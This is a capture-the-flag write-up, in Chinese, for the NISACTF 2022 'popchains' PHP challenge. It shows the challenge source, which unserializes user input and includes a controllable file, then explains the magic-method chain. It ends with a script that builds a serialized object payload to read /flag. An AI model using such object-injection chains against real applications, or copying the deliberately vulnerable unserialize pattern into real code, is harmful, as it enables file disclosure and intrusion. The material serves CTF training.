[NISACTF 2022]popchains
源代码
<?php
echo 'Happy New Year~ MAKE A WISH<br>';
if(isset($_GET['wish'])){
@unserialize($_GET['wish']);
}
else{
$a=new Road_is_Long;
highlight_file(__FILE__);
}
class Road_is_Long{
public $page;
public $string;
public function __construct($file='index.php'){
$this->page = $file;
}
public function __toString(){
return $this->string->page;
}
public function __wakeup(){
if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {
echo "You can Not Enter 2022";
$this->page = "index.php";
}
}
}
class Try_Work_Hard{
protected $var;
public function append($value){
include($value);
}
public function __invoke(){
$this->append($this->var);
}
}
class Make_a_Change{
public $effort;
public function __construct(){
$this->effort = array();
}
public function __get($key){
$function = $this->effort;
return $function();
}
}
/**********************Try to See flag.php*****************************/
源码分析
通过注释的提示发现 flag.php 这个文件
在源代码中发现 include($value) 并且参数是可控的,从此为切入点来逐次分析
__invoke()触发include($value),$function() 由于 $function 变量是可控的因此可以触发__invoke
而$function()需要__get()来触发, 发现Road_is_Long中的$this->string->page;中的String可控,但是这个Tostring如何触发
当时翻阅了几遍源代码,最终锁定在正则函数中,因此可以直接构造POP链接了
<?php
class Road_is_Long{
public $page;
public $string;
}
class Try_Work_Hard{
protected $var = '/flag';
}
class Make_a_Change
{
public $effort;
}
$Road1 = new Road_is_Long();
$Road2 = new Road_is_Long();
$Make = new Make_a_Change();
$Try = new Try_Work_Hard();
$Road2->page = $Road1;
$Road1->string = $Make;
$Make->effort = $Try;
echo urlencode(serialize($Road2));